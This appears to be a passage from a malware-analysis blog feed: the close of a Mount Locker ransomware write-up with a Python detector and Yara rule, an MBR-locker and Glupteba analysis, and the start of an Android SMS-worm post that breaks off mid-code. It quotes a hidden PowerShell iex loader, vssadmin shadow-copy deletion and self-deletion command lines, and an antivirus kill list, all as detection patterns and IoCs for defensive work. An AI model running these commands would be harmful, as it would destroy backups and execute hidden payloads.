Let's first take a look at the Ransomnote. In all investigated versions of Mount Locker it is delivered as an HTML file named <em>RecoveryManual.html</em>. It exhibits a lot of the by now classic scare tactics we know from Ransomware gangs, in the realm of "Don't try to decrypt your files, we are the only ones who can help", and of course the threat that they will release the stolen data if the Ransom is not paid in time. Communication with the criminals is to be done through a Webchat via Tor, with no Clearnet alternative except for contacting them by E-Mail (accounts registered with Protonmail, which is still the most popular Mail hosting service for Ransomware operators. See <a href="https://track.ransomware.email">ransomware.email</a> for more information).
<br></p>
<p><center><img alt="Ransomnote" src="https://dissectingmalwa.re/img/mount-ransomnote.png"></center></p>
<p><br></p>
<p>During the "Detonation run" I opened Process Monitor for a better overview of what's going on. Because I didn't want Mount Locker to terminate Process Monitor, I renamed its executable to <em>firefox.exe</em>, since this process name is on the exception list. As you can see below the Ransomware spawns four subprocesses in total: <em>Powershell</em> + <em>vssadmin</em> for process termination and restore point deletion, and <em>cmd</em> + <em>attrib</em> for self-deletion.</p>
<p><br></p>
<p><center><img alt="Process Graph" src="https://dissectingmalwa.re/img/mount-procGraph.png"></center></p>
<p><br>
I ran Mount Locker with the <em>/log:F</em> argument to have it log to a file. It created a file on the Desktop named <em>executableName.exe.log</em>, the contents of which can be seen below. The first few lines are related to the deletion of the Volume Shadow Copies. Since Mount Locker currently is not capable of escalating privileges and I ran the sample without administrative rights, the Shadow Copies were left untouched.
<br></p>
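<p>The process tree and the shadow copy deletion above translate directly into a detection. The following is an added example (not tooling from the post) that scores a parent process by the children it spawns: the hidden PowerShell loader from the Yara string <em>$x1</em> reading a <em>~[9-digit].tmp</em> from the Temp folder and piping it into <em>iex</em>, a vssadmin shadow copy deletion and a cmd/attrib self-deletion. The events are constructed Sysmon-style records; the vssadmin and cmd/attrib command lines are assumptions, only the PowerShell loader string and the dropped file name come from the post.</p>

```python
"""Process-tree detection for the Mount Locker behaviour shown above.

Added example, not tooling from the post: a parent process is scored by the
children it spawns (hidden PowerShell loader reading a ~[9-digit].tmp from
%TEMP% and piping it to iex, vssadmin shadow copy deletion, cmd/attrib
self-deletion). The events are constructed Sysmon-style records; the PowerShell
loader string and the ~[9-digit].tmp name come from the post, the vssadmin and
cmd/attrib command lines are assumptions.
"""
import re
from collections import defaultdict

# Loader pattern from the Yara string $x1: hidden window, script file read and
# piped into Invoke-Expression.
PS_LOADER = re.compile(
    r"powershell(?:\.exe)?\s+-windowstyle\s+hidden\s+-c\s+\$mypid='\d+';"
    r"\[System\.IO\.File\]::ReadAllText\('(?P<path>[^']+)'\)\|iex", re.I)
# Dropped PowerShell script: ~ plus nine digits and .tmp in the user's Temp folder.
TMP_SCRIPT = re.compile(r"\\AppData\\Local\\Temp\\~\d{9}\.tmp$", re.I)
VSSADMIN_DELETE = re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)  # assumed form
SELF_DELETE = re.compile(r"cmd(?:\.exe)?.*\battrib\b.*\bdel\b", re.I)         # assumed form

INDICATOR_WEIGHTS = {
    "ps_hidden_iex_loader": 3,
    "ps_loader_from_temp_tmp": 2,
    "vssadmin_delete_shadows": 3,
    "cmd_attrib_self_delete": 2,
}


def classify_child(cmdline):
    """Indicator names triggered by one child command line."""
    hits = []
    m = PS_LOADER.search(cmdline)
    if m:
        hits.append("ps_hidden_iex_loader")
        if TMP_SCRIPT.search(m.group("path")):
            hits.append("ps_loader_from_temp_tmp")
    if VSSADMIN_DELETE.search(cmdline):
        hits.append("vssadmin_delete_shadows")
    if SELF_DELETE.search(cmdline):
        hits.append("cmd_attrib_self_delete")
    return hits


def score_parents(events):
    """Group child hits by parent pid and sum the indicator weights.
    events: iterable of dicts with pid, ppid, image and cmdline."""
    images = {e["pid"]: e["image"] for e in events}
    hits_by_parent = defaultdict(set)
    for e in events:
        hits_by_parent[e["ppid"]].update(classify_child(e["cmdline"]))
    return {ppid: {"image": images.get(ppid, "?"), "hits": sorted(hits),
                   "score": sum(INDICATOR_WEIGHTS[h] for h in hits)}
            for ppid, hits in hits_by_parent.items() if hits}


def suspicious_parents(events, threshold=5):
    """Parents whose combined child behaviour reaches the threshold. The parent's
    image name is deliberately not part of the score: the sample can run under any
    file name, so the behaviour of the children is what is matched."""
    return {p: r for p, r in score_parents(events).items() if r["score"] >= threshold}


# Constructed sample events modelled on the process graph; not a real capture.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 800, "image": "sample.exe",
     "cmdline": r"C:\Users\user\Desktop\sample.exe /log:F"},
    {"pid": 1300, "ppid": 1200, "image": "powershell.exe",
     "cmdline": r"powershell.exe -windowstyle hidden -c $mypid='1200';[System.IO.File]"
                r"::ReadAllText('C:\Users\user\AppData\Local\Temp\~123456789.tmp')|iex"},
    {"pid": 1400, "ppid": 1200, "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 1500, "ppid": 1200, "image": "cmd.exe",
     "cmdline": r'cmd.exe /c attrib -r "C:\Users\user\Desktop\sample.exe" & '
                r'del "C:\Users\user\Desktop\sample.exe"'},
    {"pid": 2000, "ppid": 800, "image": "powershell.exe",
     "cmdline": "powershell.exe -c Get-Process"},  # benign admin use, must not score
]
```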
<p><center><img alt="Logfile" src="https://dissectingmalwa.re/img/mount-logfile.png"></center></p>
<p><br></p>
<p>Since it is probably one of the most interesting debug features of Mount Locker here is another snippet from the Log File showing the statistics of the System Drive Encryption.</p>
<p><br></p>
<p><center><img alt="Log Stats" src="https://dissectingmalwa.re/img/mount-stats.png"></center></p>
<p><br></p>
<p>And if you would like to know what happens when Mount Locker V2 is run with local admin privileges (I already hinted that it doesn't go well): after the machine is rebooted (which some users do instinctively after a Ransomware infection) Windows will not be able to boot because the <em>bootmgr</em> file was encrypted. I'm not sure if they didn't test this case or forgot to include it in their exception lists, but the user will certainly not be able to contact them with a (temporarily) bricked machine.</p>
<p><br></p>
<p><center><img alt="Bootmgr" src="https://dissectingmalwa.re/img/mount-bootmgr.png"></center></p>
<p><br></p>
<p><br></p>
<h1><strong>Conclusion / Key Takeaways</strong></h1>
<ul>
<li>Up until now only Mount Locker V2 x86 binaries have been submitted to analysis platforms in a packed state. Similar to other Ransomware Gangs they opted to deliver their x64 executables as DLLs.</li>
<li>No Obfuscation beyond the initial packing</li>
<li>No Persistence Methods used</li>
<li>Depending on the Users permissions: Mount Locker either fails to delete Shadow Copies and files on other drives or it will encrypt critical system components and render the system unusable after a reboot</li>
<li>Multiple features are not implemented in Version 2</li>
</ul>
<p>The Operators behind Mount Locker are obviously just starting out, as the observed Ransomware samples are still very verbose and noisy on execution. Although they are not nearly as active as a lot of other well-established Crimeware Groups, I expect to see more attacks from them in the upcoming year 2021. I hope this blog post will be somewhat helpful in future investigations on this Ransomware strain, and of course I will be keeping up with it as well.</p>
<p><br></p>
<p><center><b>Alright, that's it for now. Thank you for reading this blog post! If you have got any feedback please let me know, and don't miss the Yara Rule, MITRE ATT&amp;CK List and IoCs below. See ya in 2021!</b></center></p>
<p><center><img width="50%" height="50%" src="https://dissectingmalwa.re/img/borat.gif"></center></p>
<p><br></p>
<h2><strong>Yara Rule</strong></h2>
<div class="highlight"><pre><span></span><span class="kn">import</span> <span class="s2">"pe"</span>
<span class="n">rule</span> <span class="n">RANSOM_MountLocker_V2</span> <span class="p">{</span>
<span class="n">meta</span><span class="p">:</span>
<span class="n">description</span> <span class="o">=</span> <span class="s2">"Detects Mount Locker Ransomware, Version 2 x86 unpacked"</span>
<span class="n">author</span> <span class="o">=</span> <span class="s2">"Marius 'f0wL' Genheimer <hello@dissectingmalwa.re>"</span>
<span class="n">reference</span> <span class="o">=</span> <span class="s2">"https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html"</span>
<span class="n">date</span> <span class="o">=</span> <span class="s2">"20.12.2020"</span>
<span class="n">tlp</span> <span class="o">=</span> <span class="s2">"WHITE"</span>
<span class="n">hash1</span> <span class="o">=</span> <span class="s2">"226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2"</span>
<span class="n">hash2</span> <span class="o">=</span> <span class="s2">"e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037"</span>
<span class="n">strings</span><span class="p">:</span>
<span class="o">//</span><span class="n">picks</span> <span class="n">up</span> <span class="n">on</span> <span class="n">the</span> <span class="n">Volume</span> <span class="n">Serial</span> <span class="n">Number</span> <span class="n">Permutation</span> <span class="ow">in</span> <span class="n">function</span> <span class="n">mw_mutex</span>
<span class="err">$</span><span class="n">mutex_shift</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">8</span><span class="n">b</span> <span class="n">c1</span> <span class="n">c1</span> <span class="n">c8</span> <span class="err">??</span> <span class="mi">50</span> <span class="mi">8</span><span class="n">b</span> <span class="n">c1</span> <span class="n">c1</span> <span class="n">c8</span> <span class="err">??</span> <span class="mi">50</span> <span class="mi">8</span><span class="n">b</span> <span class="n">c1</span> <span class="n">c1</span> <span class="n">c8</span> <span class="err">??</span> <span class="mi">50</span> <span class="mi">51</span><span class="p">}</span>
<span class="err">$</span><span class="n">x1</span> <span class="o">=</span> <span class="s2">"powershell.exe -windowstyle hidden -c $mypid='</span><span class="si">%u</span><span class="s2">';[System.IO.File]::ReadAllText('</span><span class="si">%s</span><span class="s2">')|iex"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="o">//</span><span class="err">$</span><span class="n">x2</span> <span class="o">=</span> <span class="s2">"explorer.exe RecoveryManual.html"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">x2</span> <span class="o">=</span> <span class="s2">"RecoveryManual.html"</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">x3</span> <span class="o">=</span> <span class="s2">"expand 32-byte k"</span> <span class="n">fullword</span> <span class="n">ascii</span>
<span class="err">$</span><span class="n">x4</span> <span class="o">=</span> <span class="s2">"<b>/!</span><span class="se">\\</span><span class="s2"> YOUR NETWORK HAS BEEN HACKED /!</span><span class="se">\\</span><span class="s2"><br>"</span> <span class="n">fullword</span> <span class="n">ascii</span>
<span class="err">$</span><span class="n">s1</span> <span class="o">=</span> <span class="s2">"[SKIP] locker.volume.enum > readonly name=</span><span class="si">%s</span><span class="s2">"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">s2</span> <span class="o">=</span> <span class="s2">"[WARN] locker.dir.check > get_reparse_point gle=</span><span class="si">%u</span><span class="s2"> name=</span><span class="si">%s</span><span class="s2">"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">s3</span> <span class="o">=</span> <span class="s2">"[ERROR] locker.file > get_size gle=</span><span class="si">%u</span><span class="s2"> name=</span><span class="si">%s</span><span class="s2">"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">s4</span> <span class="o">=</span> <span class="s2">"[OK] locker > finished"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="n">condition</span><span class="p">:</span>
<span class="n">uint16</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0x5a4d</span> <span class="ow">and</span> <span class="n">filesize</span> <span class="o"><</span> <span class="mi">600</span><span class="n">KB</span>
<span class="ow">and</span> <span class="n">pe</span><span class="o">.</span><span class="n">imphash</span><span class="p">()</span> <span class="o">==</span> <span class="s2">"1ea39e61089a4ea253fb896bbcf01be5"</span>
<span class="ow">and</span> <span class="err">$</span><span class="n">mutex_shift</span>
<span class="ow">and</span> <span class="mi">2</span> <span class="n">of</span> <span class="p">(</span><span class="err">$</span><span class="n">x</span><span class="o">*</span><span class="p">)</span>
<span class="ow">and</span> <span class="mi">2</span> <span class="n">of</span> <span class="p">(</span><span class="err">$</span><span class="n">s</span><span class="o">*</span><span class="p">)</span>
<span class="p">}</span>
</pre></div>
<p><br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><a href="https://attack.mitre.org/techniques/T1012/"><em>T1012</em></a> --> Query Registry --> Discovery</p>
<p><a href="https://attack.mitre.org/techniques/T1027/"><em>T1027</em></a> --> Obfuscated Files or Information --> Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1055/"><em>T1055</em></a> --> Process Injection --> Privilege Escalation, Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1059/"><em>T1059</em></a> --> Command and Scripting Interpreter: PowerShell --> Execution</p>
<p><a href="https://attack.mitre.org/techniques/T1070/"><em>T1070</em></a> --> Indicator Removal on Host: File Deletion --> Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1076/"><em>T1076</em></a> --> Remote Desktop Protocol --> Lateral Movement</p>
<p><a href="https://attack.mitre.org/techniques/T1082/"><em>T1082</em></a> --> System Information Discovery --> Discovery</p>
<p><a href="https://attack.mitre.org/techniques/T1083/"><em>T1083</em></a> --> File and Directory Discovery --> Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1112/"><em>T1112</em></a> --> Modify Registry --> Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1129/"><em>T1129</em></a> --> Shared Modules --> Execution</p>
<p><a href="https://attack.mitre.org/techniques/T1134/"><em>T1134</em></a> --> Access Token Manipulation --> Defense Evasion, Privilege Escalation</p>
<p><a href="https://attack.mitre.org/techniques/T1486/"><em>T1486</em></a> --> Data Encrypted for Impact --> Impact</p>
<p><a href="https://attack.mitre.org/techniques/T1489/"><em>T1489</em></a> --> Service Stop --> Impact</p>
<p><a href="https://attack.mitre.org/techniques/T1490/"><em>T1490</em></a> --> Inhibit System Recovery --> Impact</p>
<p><a href="https://attack.mitre.org/techniques/T1546/"><em>T1546</em></a> --> Event Triggered Execution: Change Default File Association --> Privilege Escalation, Persistence</p>
<p><a href="https://attack.mitre.org/techniques/T1562/"><em>T1562</em></a> --> Impair Defenses: Disable or Modify Tools --> Defense Evasion</p>
<p><br></p>
<p><br></p>
<h2><strong>IOCs</strong></h2>
<h3>Mount Locker</h3>
<div class="highlight"><pre><span></span><span class="k">Version</span> <span class="mi">1</span>
<span class="n">f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963</span>
<span class="k">Version</span> <span class="mi">2</span>
<span class="mi">32</span><span class="o">-</span><span class="nb">bit</span>
<span class="mi">226</span><span class="n">a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2</span>
<span class="n">e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037</span>
<span class="mi">64</span><span class="o">-</span><span class="nb">bit</span>
<span class="mi">2</span><span class="n">d2d2e39ccae1ff764e6618b5d7636d41ac6e752ce56d69a9acbb9cb1c8183d0</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="p">[</span><span class="mi">8</span><span class="o">-</span><span class="n">digit</span> <span class="n">hex</span><span class="p">].</span><span class="n">bat</span> <span class="o">-</span> <span class="n">Batch</span> <span class="n">script</span>
<span class="o">~</span><span class="p">[</span><span class="mi">9</span><span class="o">-</span><span class="n">digit</span> <span class="nb">int</span><span class="p">].</span><span class="n">tmp</span> <span class="o">-</span> <span class="n">Powershell</span> <span class="n">script</span>
<span class="c1">--> both of these files will be dropped in C:\Users\username\AppData\Local\Temp\</span>
<span class="n">RecoveryManual</span><span class="p">.</span><span class="n">html</span>
</pre></div>
<p><br></p>The Blame Game - About False Flags and overwritten MBRs2020-04-13T00:00:00+02:002020-04-13T00:00:00+02:00f0wLtag:dissectingmalwa.re,2020-04-13:/the-blame-game-about-false-flags-and-overwritten-mbrs.html<p>MBR Lockers have become popular again with Skids. Let's look at a sample that was spread yesterday and caught a lot of attention.</p><p>Let's start right off with a short introduction: The Malware analyzed here is a so-called MBR (Master Boot Record) Locker. It is targeting (like most of the time) only PCs running Windows. The good news is: in this case there is neither encryption nor deletion happening on the file system, so there's a good chance for victims to recover their files. A possible mitigation for users would be running <a href="https://talosintelligence.com/mbrfilter">MBRFilter</a> which is developed by Talos Intelligence. Now to the Message displayed in the VM below: Pressing CTRL+ALT+ESC for a possible bypass / failsafe to boot the OS (described in this <a href="https://www.bleepingcomputer.com/news/security/new-wiper-malware-impersonates-security-researchers-as-prank/">BleepingComputer</a> article) doesn't seem to work for this sample.</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/vkwiper-vm1.png"></center></p>
<p>After Vitali published the tweet below a whole crowd formed in the emerging thread asking to please unlock their PCs. Both Vitali Kremez and MalwareHunterTeam made it clear multiple times that they are not affiliated with this campaign in any way, but some of the victims still seemed to miss this fact and got quite worked up about their PCs being compromised. Unfortunately this was not the first and won't be the last time that respected ethical researchers are targeted in such discrediting acts. I'm not qualified to talk about any psychological reasoning behind such actions, but it's either an attempt at a Denial of Service (Vitali's Twitter DMs and Mentions were filled with complaints and accusations) or looking for attention (not in this case, because there were no hints on the malware actors) like the <a href="https://twitter.com/CryptoInsane/status/1222907566365257729">Maze Team</a>.</p>
<p><br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">[*] Beware: Some scams utilize my name and impersonate myself to amplify extortions. <a href="https://t.co/wk9Mxkqxpz">pic.twitter.com/wk9Mxkqxpz</a></p>— Vitali Kremez (@VK_Intel) <a href="https://twitter.com/VK_Intel/status/1249149943702568960?ref_src=twsrc%5Etfw">April 12, 2020</a></blockquote></center></p>
<p><br></p>
<p>After talking to a victim to clarify the infection method and origin of the malware I received a link to this pirated version of Adobe Illustrator. Lures like this one are often trojanized with malware or, like in this case, straight-up malicious from the start. Obviously this cannot be considered common knowledge for every user, and this is what criminals have been taking advantage of for years and will keep doing for years to come.</p>
<p><br></p>
<p><center><img alt="Source Website" src="https://dissectingmalwa.re/img/vkwiper-crackedion.png"></center></p>
<p><br></p>
<p>A quick check confirmed my suspicion that every download on this site is "spiked" with malware. The Filenames of the executables contain a unique-per-download string. The victim will be redirected to a second site where a user agent check for Windows and matching Browsers (IE, Edge) is performed. The executable is downloaded from another URL from a directory called <strong>ru53332</strong> which might give us a hint as to where the malware originated from (this looks like a client subfolder, this host might spread other strains as well).</p>
<p><br></p>
<p><center><img alt="Tree" src="https://dissectingmalwa.re/img/vkwiper-tree.png"></center></p>
<p><br></p>
<p>Below you can see a process graph of the Glupteba Infection generated by Any.Run. This is just a subsection of the whole graph and since there was so much going on it was pretty difficult to make out if the MBR Locker actually was delivered with this installer. None of my tests in VMs or on a physical test machine resulted in a corrupted MBR, so at the moment I can neither confirm nor deny that the Locker was actually delivered via crackedion[.]com.</p>
<p><br></p>
<p><center><img alt="Process Graph" src="https://dissectingmalwa.re/img/vkwiper-pgraph.png"></center></p>
<p><br></p>
<p>Interestingly all the executables named WinmonX.sys had broken certificate chains, which should be a red flag for AVs running on the victim's system. There were startup tasks scheduled for all three of these files.</p>
<p><center><img alt="Certificate Verification" src="https://dissectingmalwa.re/img/vkwiper-winmoncert.png"></center></p>
<p><br></p>
<p>WinMonProcessManager contains a list of ca. 600 Anti-Virus executable names and its only purpose is to disable all AV services while the trojan does its "magic":
<br></p>
<div class="highlight"><pre><span></span><span class="n">exantivirus</span><span class="o">-</span><span class="n">cnet</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">zonealarm</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">ldnetmon</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">norton_internet_secu_3</span><span class="p">.</span><span class="mi">0</span><span class="n">_407</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">antivirus</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">netmon</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">AvastPE2</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">avast_free_antivirus_setup_online</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">EmsisoftAntiMalwareSetup</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">drweb32</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">nod32</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">f</span><span class="o">-</span><span class="n">prot95</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">f</span><span class="o">-</span><span class="n">prot</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">drwebupw</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">AvastUI</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">mcshield</span><span class="p">.</span><span class="n">exe</span> <span 
class="p">...</span> <span class="k">and</span> <span class="n">so</span> <span class="k">on</span> <span class="err">π</span>
</pre></div>
<p><br></p>
<p>The detection signatures from different engines on VT and the Intezer analysis declared the dropped executables as parts of the Glupteba Trojan, which has been around for some time now. Additionally there were hints to another strain called RanumBot that I have not investigated further up until now. In the screenshot you can see the <strong>windefender.exe</strong> sample that was submitted to Intezer. It was written in Go, packed with UPX and stuffed with strings. I did not investigate this executable further, but at first I thought that this could have been the MBR Locker because it contains strings related to Poly1305/ChaCha20.</p>
<p><br></p>
<p><center><img alt="Intezer" src="https://dissectingmalwa.re/img/vkwiper-glupteba.png"></center></p>
<p><br></p>
<p>To show the effect of the MBR Locker on the OS Drive I simply used a live system to write the first sector of the Disk to a file ( <em>sudo dd if=/dev/sdX of=mbrdump.bin bs=512 count=1</em> ). The top dump shows the standard MBR contents and below is the corrupted version displaying only the message to the user.</p>
<p><br></p>
<p><center><img alt="Good MBR" src="https://dissectingmalwa.re/img/vkwiper-mbrg.png"></center>
<center><img alt="Overwritten MBR" src="https://dissectingmalwa.re/img/vkwiper-mbrc.png"></center></p>
<p><br></p>
<p>Reading the imports with Rabin2 there's nothing out of the ordinary, but there are a few things I wanted to see here. I expected to see CreateFile, which would be used to write the MBR text payload to the first sector of the disk (<strong>\\.\PhysicalDrive0</strong>) later. Unlike Petya, which checked whether the PartitionStyle of the drive is actually an MBR (via DeviceIoControl), this MBR Locker isn't too concerned about that. There is also some generic anti-debugging via IsDebuggerPresent, but I didn't expect any further measures since the overall design of the malware is very poor.</p>
<p><br></p>
<p><center><img alt="Imports" src="https://dissectingmalwa.re/img/vkwiper-rabin2.png"></center></p>
<p><br></p>
<p>Taking a look at the sections of the binary we can spot a <em>.upx</em> section. This looks suspicious because a sample packed with UPX would have three sections named upx0 (packed), upx1 (stub) and optionally upx2 (unpacked) like in the image below.</p>
<p><br></p>
<p><center><img alt="Sections" src="https://dissectingmalwa.re/img/vkwiper-sections.png"></center></p>
<p><center><img alt="UPX" src="https://dissectingmalwa.re/img/vkwiper-whatupxlookslike.png"></center></p>
<p><br></p>
<p>Printing the contents of the <strong>.upx</strong> section we can see that the text payload is encrypted.</p>
<p><br></p>
<p><center><img alt="Overwritten MBR" src="https://dissectingmalwa.re/img/vkwiper-upx2.png"></center></p>
<p><br></p>
<p>The decryption routine is found very quickly since the executable only contains three functions in total. As one might have guessed already the text payload is XORed and therefore has to be decrypted before writing to the MBR. The screenshot below shows the decryption function and south of that you can see the text extraction out of the <strong>.upx</strong> section we discussed earlier.</p>
<p><br></p>
<p><center><img alt="XOR Decryption Function" src="https://dissectingmalwa.re/img/vkwiper-xor.png"></center></p>
<p><center><img alt="Reading the ciphertext out of .upx" src="https://dissectingmalwa.re/img/vkwiper-radare-upx.png"></center></p>
<p><br></p>
<p>The good-ish news is that in this case the changes made to the Master Boot Record are reversible with a Backup of the MBR Sector. Alternatively victims can try to repair the MBR with Microsoft's <em>bootrec /fixmbr and /fixboot</em>. Success in this case depends on the partition style of the Windows install (since the MBR in GPT layouts is reserved for protective Reasons; on MBR installs bootrec may not be able to recover the Partition table because the whole sector is overwritten. See Vitali's Tweet <a href="https://twitter.com/VK_Intel/status/1249724110663532546">here</a>). I verified on a physical GPT install that LBA 1 and following is not affected by the MBRLocker and should keep the GPT recoverable. <a href="https://www.cgsecurity.org/wiki/TestDisk">TestDisk</a> is theoretically capable of recovering both partitioning layouts. I'd advise victims to use File Recovery software like <a href="https://www.cgsecurity.org/wiki/PhotoRec">Photorec</a> as an option for data recovery if a clean install is necessary.</p>
<p>In one case a victim contacted me about an additional STOP Ransomware Infection (.mpaj extension, online keyed), but at the moment I can't confirm that this incident happened in conjunction with the pirated Software Installer / MBRLocker.</p>
<p><br></p>
<p><center><b>As there is currently no public sample of the second version of the MBR Locker I will update this article once it is available. Stay tuned :)</b></center></p>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1059</em> --> Command-Line Interface --> Execution</p>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1112</em> --> Modify Registry --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><br></p>
<h2><em>IOCs</em></h2>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">crackedion</span><span class="p">[.]</span><span class="n">com</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">dataf0ral1</span><span class="p">[.]</span><span class="n">com</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">1</span><span class="n">podcast</span><span class="p">[.]</span><span class="n">best</span><span class="o">/</span><span class="n">ru53332</span><span class="o">/</span>
</pre></div>
<h3>Ransomnote V1</h3>
<div class="highlight"><pre><span></span><span class="o">~</span><span class="nv">SentinelOne</span> <span class="nv">Labs</span> <span class="nv">Ransomware</span><span class="o">~</span>
<span class="nv">Your</span> <span class="nv">system</span> <span class="nv">was</span> <span class="nv">unprotected</span>, <span class="nv">so</span> <span class="nv">we</span> <span class="nv">locked</span> <span class="nv">down</span> <span class="nv">access</span> <span class="nv">to</span> <span class="nv">Windows</span>.
<span class="nv">You</span> <span class="nv">need</span> <span class="nv">to</span> <span class="nv">buy</span> <span class="nv">SentinelOne</span> <span class="nv">antivirus</span> <span class="nv">in</span> <span class="nv">orer</span> <span class="nv">to</span> <span class="nv">restore</span> <span class="nv">your</span> <span class="nv">computer</span>.
<span class="nv">My</span> <span class="nv">name</span> <span class="nv">is</span> <span class="nv">Vitali</span> <span class="nv">Kremez</span>. <span class="nv">Contacts</span> <span class="nv">are</span> <span class="nv">below</span>.
<span class="nv">Phone</span>: [<span class="nv">Redacted</span>]
<span class="nv">E</span><span class="o">-</span><span class="nv">mail</span> <span class="mi">1</span>: [<span class="nv">Redacted</span>]
<span class="nv">E</span><span class="o">-</span><span class="nv">mail</span> <span class="mi">2</span>: [<span class="nv">Redacted</span>]
<span class="nv">After</span> <span class="nv">you</span> <span class="nv">buy</span> <span class="nv">my</span> <span class="nv">antivirus</span> <span class="nv">I</span> <span class="nv">will</span> <span class="k">send</span> <span class="nv">you</span> <span class="nv">unlock</span> <span class="nv">code</span>.
<span class="nv">Enter</span> <span class="nv">Unlock</span> <span class="nv">code</span>:
</pre></div>
<p><br></p>
<h2>Jamba Superdeal: Helo Sir, you want to buy mask? - Corona Safety Mask SMS Scam</h2>
<p>Published 2020-03-20 by f0wL (tag:dissectingmalwa.re,2020-03-20:/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html)</p>
<p>As if there wasn't enough pain and suffering in the world already because of COVID-19, some criminals still try to piggyback on the fear of others. A quick look at an Android SMS "Worm".</p>
<p>Since the current COVID-19 outbreak is being massively taken advantage of by various cybercriminals, I thought it would be a good opportunity to try out Android reverse engineering. Let's dive right in:</p>
<p><br></p>
<p><center><img alt="Webpage" src="https://dissectingmalwa.re/img/csm-web.png"></center></p>
<p><br></p>
<p>The following dynamic part of this analysis was done in VirtualBox with the most recent version of <a href="https://www.android-x86.org/">Android-x86</a>. For those playing along at home: the setup is really simple (live booting is sufficient). Just remember to crank up the video memory, change the graphics controller to <strong>VBoxVGA</strong> and enable 3D acceleration, as otherwise the VM will only boot to a command prompt.</p>
<p><center><img alt="Installation" src="https://dissectingmalwa.re/img/csm-vbox.png"></center></p>
<p><br></p>
<p>During the installation process no permissions have to be granted to the app.</p>
<p><center><img alt="Installation" src="https://dissectingmalwa.re/img/csm-install.png"></center></p>
<p><br></p>
<p>Before finishing the installation there is a Google Play Protect warning already. I'm not sure if this is a signature based detection or actually based on the expected behaviour while parsing the package. I'll install it anyway.</p>
<p><center><img alt="Google Play Protect" src="https://dissectingmalwa.re/img/csm-playprot.png"></center></p>
<p><br></p>
<p>After opening "Corona Safety Mask" for the first time it will ask for the permission to access the user's address book.</p>
<p><center><img alt="Contacts Permissions" src="https://dissectingmalwa.re/img/csm-contacts.png"></center></p>
<p><br></p>
<p>Secondly, it requires the permission to send SMS messages as well. This should be a red flag to users in general if the request is made without any notice as to why this permission is required (e.g. for two-factor authentication). Scams like this can get very expensive for the user, which is probably also one of the major goals of this malware.</p>
<p><center><img alt="SMS Permissions" src="https://dissectingmalwa.re/img/csm-sms.png"></center></p>
<p><br></p>
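<p>A quick way to triage an APK for exactly this pattern, before ever running it, is to read the decoded manifest and look for permission combinations that together add up to a capability the app has no business having. The following Python helper is an added example and not code from the original post or from the app itself; the manifest it parses is constructed to mirror the two permissions observed above (the package name and activity are made up).</p>

```python
import xml.etree.ElementTree as ET

# Android attributes (android:name) live in this namespace; elements do not.
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permission sets that together grant a capability an app has to justify.
# Each entry: (permissions that must all be declared, what that set allows).
SUSPICIOUS_COMBOS = [
    ({"android.permission.READ_CONTACTS", "android.permission.SEND_SMS"},
     "can read the address book and text every entry (SMS self-propagation)"),
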